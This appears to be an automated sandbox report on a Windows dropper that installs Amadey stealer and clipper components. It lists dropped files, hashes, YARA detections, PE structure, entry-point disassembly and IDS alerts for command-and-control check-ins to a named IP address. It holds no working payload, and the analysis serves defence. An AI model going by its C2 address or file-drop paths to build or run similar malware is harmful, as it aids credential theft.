                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):241664
                            Entropy (8bit):6.368190069123744
                            Encrypted:false
                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):391680
                            Entropy (8bit):7.696200600980202
                            Encrypted:false
                            SSDEEP:6144:KTy+bnr+Bp0yN90QE8rUZ4mLoOCS4IM/yTxjwEC58K+CNJ9EtTZI9AjX:NMrly90tZ4OoOCS4IM/+jwEnKNNJ9EtX
                            MD5:243D9E7FA50F53508036E1579B603367
                            SHA1:C3C66C21E6A47AC83DC507FD334428EC954FC097
                            SHA-256:62F27AF71BE9F88FD1BF94B8B711A81B050457E010C37483BDFFADB08A89CBE5
                            SHA-512:449EE0AF8CE83545FB0EB3F6248B08CFC88C4078AF0E92D22EAAEE44C511A70F3167E1CA71376930DFE6CCEF793C99476AC3C839CB31B30742F4CD61A439E15B
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Reputation:unknown
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):241664
                            Entropy (8bit):6.368190069123744
                            Encrypted:false
                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):371200
                            Entropy (8bit):6.5684570596278204
                            Encrypted:false
                            SSDEEP:3072:zPz1RIKRNSN36gYwI+JlK1CgR9unxsQi1VV5C5WZr7p9Xaoe7YRLStKRxhUwk:z7X9QZEXMxNirIkr7fgtKBk
                            MD5:7A0C89DA78468AC421B2B1CD1A36DEE9
                            SHA1:15631B339E869BC42C0B027DEEBFD52F03FE736C
                            SHA-256:642257FB52201EB48F5B41DBB961EEE93E95A187006141E6B4F0B525833C280B
                            SHA-512:A06E6CC7ECE58AC7F035B702D25A9049F4184DB159D592D4D88C20A2BF6A901B3ACE68473B0CE420BA038CAF7C50E8D181EFF72194D7888B40DC4CE568F66916
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 36%
                            Reputation:unknown
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):11264
                            Entropy (8bit):4.97029807367379
                            Encrypted:false
                            SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                            MD5:7E93BACBBC33E6652E147E7FE07572A0
                            SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                            SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                            SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 82%
                            Reputation:unknown
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):91136
                            Entropy (8bit):6.3469756750979025
                            Encrypted:false
                            SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                            MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                            SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                            SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):4.621829903792328
                            Encrypted:false
                            SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                            MD5:1B7C22A214949975556626D7217E9A39
                            SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                            SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                            SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                            Malicious:false
                            Reputation:unknown
                            Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                            Process:C:\Windows\SysWOW64\cacls.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):15
                            Entropy (8bit):3.240223928941852
                            Encrypted:false
                            SSDEEP:3:o3F:o1
                            MD5:509B054634B6DE74F111C3E646BC80FD
                            SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                            SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                            SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                            Malicious:false
                            Reputation:unknown
                            Preview:processed dir:
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.830718398083216
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:582656
                            MD5:3c86571f94ae2a9b196c945890c4d48a
                            SHA1:7bb15580dc7270573c9d1f76c78133b6f049c9d4
                            SHA256:f3d60db1572877967d2c8a48d1a41c40f40ad459b1965eb959494ade84a22ca2
                            SHA512:716ee022d80c68e2f5a3124cdc51ba9b0a25865b561301790dda79eb79f2717dfd12e5a2170d22381bab371f62a93c15ba5a62a4a17c74cb526362aba41a21bd
                            SSDEEP:12288:/Mr6y90nlvs5dsVuc0WS4BM/+hwOzKNN79ytdZIejhT1jWaQr:1yKvs5ds3U4BM/aKjZid2ebi
                            TLSH:86C40147B7EC4022D8B5237019F602C303767EA06A7897AF274F7D6A1C736A4B635366
                            Icon Hash:f8e0e4e8ecccc870
                            Entrypoint:0x406a60
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:10
                            OS Version Minor:0
                            File Version Major:10
                            File Version Minor:0
                            Subsystem Version Major:10
                            Subsystem Version Minor:0
                            Import Hash:646167cce332c1c252cdcb1839e0cf48
                            Instruction
                            call 00007F88B4FD8315h
                            jmp 00007F88B4FD7C25h
                            push 00000058h
                            push 004072B8h
                            call 00007F88B4FD83B7h
                            xor ebx, ebx
                            mov dword ptr [ebp-20h], ebx
                            lea eax, dword ptr [ebp-68h]
                            push eax
                            call dword ptr [0040A184h]
                            mov dword ptr [ebp-04h], ebx
                            mov eax, dword ptr fs:[00000018h]
                            mov esi, dword ptr [eax+04h]
                            mov edi, ebx
                            mov edx, 004088ACh
                            mov ecx, esi
                            xor eax, eax
                            lock cmpxchg dword ptr [edx], ecx
                            test eax, eax
                            je 00007F88B4FD7C3Ah
                            cmp eax, esi
                            jne 00007F88B4FD7C29h
                            xor esi, esi
                            inc esi
                            mov edi, esi
                            jmp 00007F88B4FD7C32h
                            push 000003E8h
                            call dword ptr [0040A188h]
                            jmp 00007F88B4FD7BF9h
                            xor esi, esi
                            inc esi
                            cmp dword ptr [004088B0h], esi
                            jne 00007F88B4FD7C2Ch
                            push 0000001Fh
                            call 00007F88B4FD814Bh
                            pop ecx
                            jmp 00007F88B4FD7C5Ch
                            cmp dword ptr [004088B0h], ebx
                            jne 00007F88B4FD7C4Eh
                            mov dword ptr [004088B0h], esi
                            push 004010C4h
                            push 004010B8h
                            call 00007F88B4FD7D76h
                            pop ecx
                            pop ecx
                            test eax, eax
                            je 00007F88B4FD7C39h
                            mov dword ptr [ebp-04h], FFFFFFFEh
                            mov eax, 000000FFh
                            jmp 00007F88B4FD7D59h
                            mov dword ptr [004081E4h], esi
                            cmp dword ptr [004088B0h], esi
                            jne 00007F88B4FD7C3Dh
                            push 004010B4h
                            push 004010ACh
                            call 00007F88B4FD8305h
                            pop ecx
                            pop ecx
                            mov dword ptr [000088B0h], 00000000h
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x85ce8 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x92000 | 0x888 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc | 0xc000 | 0x86000 | 0x85e00 | False | 0.9305920284780579 | data | 7.87144868718461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0x92000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country
                            AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
                            RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
                            RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
                            RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
                            RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
                            RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
                            RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
                            RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
                            RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
                            RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                            RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
                            RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
                            RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
                            RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
                            RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
                            RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
                            RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
                            RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
                            RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
                            RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
                            RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
                            RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
                            RT_DIALOG | 0x25764 | 0x130 | data | English | United States
                            RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
                            RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
                            RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
                            RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
                            RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
                            RT_STRING | 0x25d3c | 0x520 | data | English | United States
                            RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
                            RT_STRING | 0x2678c | 0x5cc | data | English | United States
                            RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
                            RT_STRING | 0x272ec | 0x4b0 | data | English | United States
                            RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
                            RT_STRING | 0x27c50 | 0x44a | data | English | United States
                            RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
                            RT_STRING | 0x284dc | 0x3ce | data | English | United States
                            RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
                            RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
                            RT_RCDATA | 0x28bb0 | 0x6800c | Microsoft Cabinet archive data, many, 425996 bytes, 2 files, at 0x2c +A "bmKg.exe" +A "xriv.exe", ID 1578, number 1, 20 datablocks, 0x1503 compression | English | United States
                            RT_RCDATA | 0x90bbc | 0x4 | data | English | United States
                            RT_RCDATA | 0x90bc0 | 0x24 | data | English | United States
                            RT_RCDATA | 0x90be4 | 0x7 | ASCII text, with no line terminators | English | United States
                            RT_RCDATA | 0x90bec | 0x7 | ASCII text, with no line terminators | English | United States
                            RT_RCDATA | 0x90bf4 | 0x4 | data | English | United States
                            RT_RCDATA | 0x90bf8 | 0x9 | ASCII text, with no line terminators | English | United States
                            RT_RCDATA | 0x90c04 | 0x4 | data | English | United States
                            RT_RCDATA | 0x90c08 | 0x9 | ASCII text, with no line terminators | English | United States
                            RT_RCDATA | 0x90c14 | 0x4 | data | English | United States
                            RT_RCDATA | 0x90c18 | 0x6 | data | English | United States
                            RT_RCDATA | 0x90c20 | 0x7 | ASCII text, with no line terminators | English | United States
                            RT_RCDATA | 0x90c28 | 0x7 | ASCII text, with no line terminators | English | United States
                            RT_GROUP_ICON | 0x90c30 | 0xbc | data | English | United States
                            RT_VERSION | 0x90cec | 0x408 | data | English | United States
                            RT_VERSION | 0x910f4 | 0x410 | data | Russian | Russia
                            RT_MANIFEST | 0x91504 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
                            DLL | Import
                            ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                            KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                            GDI32.dll | GetDeviceCaps
                            USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                            msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                            COMCTL32.dll |
                            Cabinet.dll |
                            VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                            Language of compilation system | Country where language is spoken | Map
                            English | United States |
                            Russian | Russia |
                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            02/08/23-17:38:41.059224 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49959 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:19.127296 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50094 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:53.716250 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50226 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:26.868385 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49705 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:04.293934 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50033 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:40:08.597775 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50287 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:27.718211 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50128 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:40:19.866231 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50324 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:44.075524 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49766 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:16.250245 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49864 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:28.471918 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50131 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:44.828385 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50189 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:55.306674 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49803 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:25.224383 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49901 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:23.070647 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49892 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:53.902748 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49990 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:11.150219 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50061 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:53.714298 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49799 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:24.270543 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49897 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:50.997871 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49794 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:37.329606 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49738 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:03.530213 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49836 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:35.008002 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49934 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:12.352601 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50066 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:36.434453 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50164 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:40:02.469570 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50262 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:38.059835 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49741 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:55.087422 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49995 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:34.495754 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50156 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:52.696926 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49987 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:21.322750 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50103 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:37:36.045612 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49733 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:38:17.481259 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49869 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:39:46.717263 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50197 | 80 | 192.168.2.4 | 62.204.41.4
                            02/08/23-17:40:21.110664 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 50329 | 80 | 192.168.2.4 | 62.204.41.4
                            192.168.2.462.204.41.449906802027700 02/08/23-17:38:26.442985TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449811802027700 02/08/23-17:37:57.197655TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449828802027700 02/08/23-17:38:01.248597TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450038802027700 02/08/23-17:39:05.523813TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450192802027700 02/08/23-17:39:45.528132TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450234802027700 02/08/23-17:39:55.624345TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449921802027700 02/08/23-17:38:30.054351TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449786802027700 02/08/23-17:37:48.848861TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449884802027700 02/08/23-17:38:21.133806TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.462.204.41.4
